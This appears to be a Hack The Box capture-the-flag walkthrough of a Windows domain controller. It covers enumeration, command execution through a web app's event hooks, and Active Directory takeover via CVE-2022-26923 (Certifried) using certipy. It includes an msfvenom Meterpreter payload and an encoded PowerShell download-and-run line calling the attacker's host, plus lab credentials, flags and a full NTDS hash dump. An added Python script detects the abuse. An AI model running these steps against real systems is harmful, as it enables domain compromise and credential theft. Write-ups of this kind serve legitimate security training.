Certification

Enumeration:

sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp  open  http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
57496/tcp open  msrpc         Microsoft Windows RPC
59262/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
64924/tcp open  msrpc         Microsoft Windows RPC

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126

SMB         10.129.230.126  445    CFN-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)

Visit http://10.129.230.126:8000/ and log in with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered by different events, e.g. Before Rename.

Preparation:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1

nano Public/bp-simple-runim64.ps1

echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA

cd Public/
sudo python3 -m http.server 80

Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive a Meterpreter session.

meterpreter > cat user.txt

HTB{Abu51ng_F34tur3s_4r3_fun}

Nice. Discover user credentials:

meterpreter > cat applist.ps1

$user = "daniel.morgan"
$pass = "FDOnolk(naws)"

The challenge name hints at ADCS. A recent ADCS vulnerability, CVE-2022-26923 (Certifried), is described here:

https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

Enumeration:

certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'

...
Template Name                       : Machine
Certificate Authorities             : certification-CFN-SVRDC01-CA
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectRequireDnsAsCn
                                      SubjectAltRequireDns
Enrollment Flag                     : AutoEnrollment
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Application Policies                : 
Authorized Signatures Required      : 0
Validity Period                     : 1 year
Renewal Period                      : 6 weeks
Permissions
  Enrollment Permissions
    Enrollment Rights               : CERTIFICATION.HTB\Domain Admins
                                      CERTIFICATION.HTB\Domain Computers
                                      CERTIFICATION.HTB\Enterprise Admins
...

Looks good! Exploitation:

sudo nano /etc/hosts

10.129.224.146  CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb

(The IP address has changed due to reboots.)

Create a new machine account wtf$ and use the -dns flag to set its dNSHostName to that of the domain controller, abusing CVE-2022-26923.

certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)

Password:
[*] Creating new account:
    sAMAccountName                      : wtf$
    unicodePwd                          : J6AeabTzuSGNFElP
    userAccountControl                  : 4096
    servicePrincipalName                : HOST/wtf
                                          RestrictedKrbHost/wtf
    dnsHostName                         : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'

Now request the certificate. The only difference from the blog post is the -dynamic-endpoint flag (the request did not work without it).

certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'
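The account created above carries the domain controller's dNSHostName, which is what lets the CA issue a DC certificate to wtf$. The following script is an added defensive check, not part of this writeup or of Certipy, that walks computer objects and flags a dNSHostName that does not match the account's own name or is shared by several accounts; the records are constructed from the names seen in this box.

```python
"""Flag machine accounts whose dNSHostName does not match their own name
(the CVE-2022-26923 / Certifried pattern) or that share a dNSHostName.
Added example code; the records below are constructed from the values in
the walkthrough, not read from a live directory."""

from collections import defaultdict

DOMAIN = "certification.htb"

# Constructed LDAP-style records (sAMAccountName, dNSHostName) for the
# computer objects of this domain. 'wtf$' carries the DC's hostname, which
# is exactly what 'certipy account create ... -dns' set above.
COMPUTERS = [
    {"sAMAccountName": "CFN-SVRDC01$", "dNSHostName": "CFN-SVRDC01.certification.htb"},
    {"sAMAccountName": "CFN-WKS001$", "dNSHostName": "CFN-WKS001.certification.htb"},
    {"sAMAccountName": "SETUPMACHINE$", "dNSHostName": None},
    {"sAMAccountName": "wtf$", "dNSHostName": "CFN-SVRDC01.certification.htb"},
]


def expected_dns_hostname(sam, domain=DOMAIN):
    """dNSHostName a computer account should carry: <name>.<domain>, lowercased."""
    return f"{sam.rstrip('$')}.{domain}".lower()


def find_dns_hostname_abuse(computers, domain=DOMAIN):
    """Return findings as (kind, sAMAccountName(s), dNSHostName) tuples.

    kinds: 'foreign-suffix' (outside the domain), 'name-mismatch' (hostname
    part differs from the account name), 'duplicate' (several accounts
    claim the same dNSHostName, e.g. a rogue account claiming the DC)."""
    findings = []
    owners = defaultdict(list)
    for c in computers:
        sam, dns = c["sAMAccountName"], c.get("dNSHostName")
        if not dns:
            continue  # nothing set, nothing to validate
        dns_l = dns.lower()
        owners[dns_l].append(sam)
        if not dns_l.endswith("." + domain.lower()):
            findings.append(("foreign-suffix", sam, dns))
        elif dns_l != expected_dns_hostname(sam, domain):
            findings.append(("name-mismatch", sam, dns))
    for dns_l, sams in owners.items():
        if len(sams) > 1:
            findings.append(("duplicate", ",".join(sorted(sams)), dns_l))
    return findings


if __name__ == "__main__":
    for kind, sam, dns in find_dns_hostname_abuse(COMPUTERS):
        print(f"{kind:15} {sam:24} {dns}")
```

In a real audit the records come from an LDAP query for objectClass=computer; note that the "Certificate object SID is None" line above shows the CA issued this certificate without the SID security extension the May 2022 patch adds, so the DC mapped the certificate on dNSHostName alone.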

Use the certificate to retrieve the NT hash of the domain controller's machine account:

certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a

DCSync:

/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds

SMB         10.129.224.146  445    CFN-SVRDC01      [+] Dumping the NTDS, this could take a while so go grab a redbull...

SMB         10.129.224.146  445    CFN-SVRDC01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB         10.129.224.146  445    CFN-SVRDC01      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.224.146  445    CFN-SVRDC01      krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB         10.129.224.146  445    CFN-SVRDC01      daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB         10.129.224.146  445    CFN-SVRDC01      certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB         10.129.224.146  445    CFN-SVRDC01      CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB         10.129.224.146  445    CFN-SVRDC01      SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB         10.129.224.146  445    CFN-SVRDC01      wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::

Collect the flag:

impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb

# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt

HTB{c3rtif1c4t35_c4n_8e_f4k3d}

Excellent.